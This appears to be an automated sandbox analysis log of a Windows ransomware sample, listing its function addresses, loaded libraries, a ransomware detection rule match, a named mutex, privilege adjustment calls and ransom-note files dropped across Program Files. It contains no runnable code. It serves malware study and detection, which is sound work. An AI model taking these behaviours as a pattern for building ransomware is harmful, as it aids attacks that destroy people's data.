Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060FA600_2_0060FA60
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0064DA200_2_0064DA20
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0066BA080_2_0066BA08
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00615AE00_2_00615AE0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00607AC00_2_00607AC0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005E7AE00_2_005E7AE0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0064DAA00_2_0064DAA0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00613B700_2_00613B70
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00603BD00_2_00603BD0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0065FB900_2_0065FB90
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060DC300_2_0060DC30
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00619C000_2_00619C00
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C7CDE0_2_005C7CDE
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0067FCAF0_2_0067FCAF
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060BC800_2_0060BC80
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005E9CB00_2_005E9CB0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C7D6D0_2_005C7D6D
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00611D500_2_00611D50
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00623DC00_2_00623DC0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00615DB00_2_00615DB0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00613DB00_2_00613DB0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00619E000_2_00619E00
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0067BEED0_2_0067BEED
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0060FF400_2_0060FF40
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005E9FD00_2_005E9FD0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00659FC00_2_00659FC0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00613FB00_2_00613FB0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_0061FFB00_2_0061FFB0
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_00621F900_2_00621F90
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005D6930 appears 81 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DB8A0 appears 431 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005D2780 appears 43 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 00680280 appears 605 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005D4170 appears 32 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DB870 appears 133 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005E96C0 appears 59 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005D30E0 appears 37 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DBAE0 appears 76 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DFF20 appears 125 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005DB970 appears 45 times
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: String function: 005F5A30 appears 47 times
Source: win_gui.exe.exe, 00000000.00000003.2843536358.00000000081FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs win_gui.exe.exe
Source: win_gui.exe.exe, 00000000.00000003.2837498402.00000000081EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs win_gui.exe.exe
Source: win_gui.exe.exe, 00000000.00000003.2942515228.00000000081FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs win_gui.exe.exe
Source: win_gui.exe.exe, 00000000.00000002.4487208352.00000000081FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs win_gui.exe.exe
Source: win_gui.exe.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 0.2.win_gui.exe.exe.5c0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM description = Detects executables containing many references to VEEAM. Observed in ransomware
Source: classification engineClassification label: mal92.rans.spre.expl.evad.winEXE@1/1341@1/100
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005C6C41 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,0_2_005C6C41
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CA48C CreateToolhelp32Snapshot,Module32FirstW,CloseHandle,StrStrIW,0_2_005CA48C
Source: C:\Users\user\Desktop\win_gui.exe.exeCode function: 0_2_005CBB5F CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoCreateInstance,GetNativeSystemInfo,CoCreateInstance,VariantInit,VariantClear,CoSetProxyBlanket,CoUninitialize,VariantInit,VariantClear,0_2_005CBB5F
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeMutant created: \Sessions\1\BaseNamedObjects\BEWAREBEAST666
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Users\user\AppData\Local\Temp\default.tmpJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeCommand line argument: README.TXT0_2_005C55DF
Source: C:\Users\user\Desktop\win_gui.exe.exeCommand line argument: README.TXT0_2_005C55DF
Source: C:\Users\user\Desktop\win_gui.exe.exeCommand line argument: 9925470_2_005C55DF
Source: win_gui.exe.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\win_gui.exe.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: win_gui.exe.exeString found in binary or memory: id-cmc-addExtensions
Source: win_gui.exe.exeString found in binary or memory: set-addPolicy
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4a04656d-52aa-49de-8a09-cb178760e748}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile written: C:\Program Files (x86)\Mozilla Maintenance Service\updater.iniJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Microsoft Office 15\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Uninstall Information\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\7-Zip\Lang\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\7-Zip\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Esl\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\CMap\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\SaslPrep\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Javascripts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\Pfm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\prc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\CAN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\DEU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\FRA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\JPN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\UK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\ICU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\PMP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\Adobe\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\Mac\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\Mappings\win\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\resources\ui\font\README.TXTJump to behavior
